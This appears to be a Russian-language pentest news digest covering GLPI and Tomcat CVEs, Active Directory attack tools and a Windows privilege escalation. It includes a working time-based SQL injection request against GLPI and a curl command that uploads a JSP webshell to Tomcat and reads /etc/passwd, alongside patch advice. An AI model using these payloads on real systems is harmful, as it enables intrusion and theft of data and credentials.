🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801

Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.

🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18

🔍 PoC:

POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232

<?xml version="1.0" encoding="UTF-8"?>
    <xml>
    <QUERY>get_params</QUERY>
    <deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
    <content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>

🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html

‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.

🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i

📥 Доступ к вебшеллу:

curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i

📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.

😈 [ Alex Neff @al3x_n3ff ]

NetExec v1.4.0 has been released! 🎉

There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system

And much more!
Full rundown:

🔗 https://github.com/Pennyw0rth/NetExec/releases/tag/v1.4.0

🐥 [ tweet ]

NTLM релей в WinRMS, не ждали? А вот...

Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./

Soft: https://github.com/fortra/impacket/pull/1947

#pentest #redteam #relay #ad #lateralmovement

Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.

https://github.com/p0dalirius/FindUnusualSessions

#pentest #redteam #ad #enum

CVE-2025-21204: LPE in Windows Update Stack

A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.

Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/

Coverage (Покрытие).
Начну с базы, даже с двух:
1. В 95% случаев получить права админа домена не сложно, и чаще всего это занимает не более 2 часов;
2. Большинство заказчиков хочет не просто пентест, а ПОКРЫТИЕ (т.е. что бы нашли и описали как можно больше уязвимостей и векторов).
И вот у каждого из нас наступает день, когда у заказчика 4 разных домена, куча разных целей и уязвимостей в смежных системах. Сделать хорошее покрытие нет ни сил ,ни времени, ни желания... Лично я в любом случае всегда собираю для каждого домена ldapdomaindump, secretsdump NTDS.DIT (если заказчик согласовал, без разрешения так делать не стоит), и в принципе этих данных достаточно что бы найти множество багов после проекта, на этапе подготовки отчета:
1. Kerberoasting;
2. As-Rep Roasting;
3. Проверить есть ли пароли в дескрипшинах у пользователей;
4. Подсветить опасные реюзы паролей у привилегированных пользователей;
5. Чекнуть возможность проведения атаки Pre2k (это неплохой вектор начального доступа, но когда права админа домена в кармане, не хочется проверять такие базовые, но опасные уязвимости)
6. Включенное обратимое шифрование в базе NTDS.DIT;
7. Неограниченное делегирование;
8. Слабые пароли и сколько их в домене
и много-много других...
Специально для решения этой задачи я написал небольшой скрипт на Python, который распарсит ldd, dump и brute и сделает удовлетворительное покрытие. На выходе мы получаем отчет в формате MarkDown. Каждая уязвимость описывается отдельно в папке modules по следующему правилу. Вы можете легко дописать множество своих проверок или удобно поменять текущие. Пример отчета прикладываю к посту.

😈 [ Alex Neff @al3x_n3ff ]

A new module has been merged into NetExec: change-password🔥

Accounts with STATUS_PASSWORD_EXPIRED aren't a problem anymore, just reset their password.
You can also abuse ForceChangePassword to reset another user's password.

Made by @kriyosthearcane, @mehmetcanterman and me.

🐥 [ tweet ]

вьетнамские флешбеки 5летней давности - https://snovvcra.sh/2020/10/31/pretending-to-be-smbpasswd-with-impacket.html

EvilentCoerce

A PoC tool that triggers the ElfrOpenBELW procedure in the MS-EVEN RPC interface (used for Windows Event Log service), causing the target machine to connect to an attacker-controlled SMB share. If antivirus software (e.g., Defender) is present, it may scan the file and unintentionally leak NetNTLMv2 credentials, which can be relayed via ntlmrelayx.

Blog: https://habr.com/ru/companies/tomhunter/articles/907068/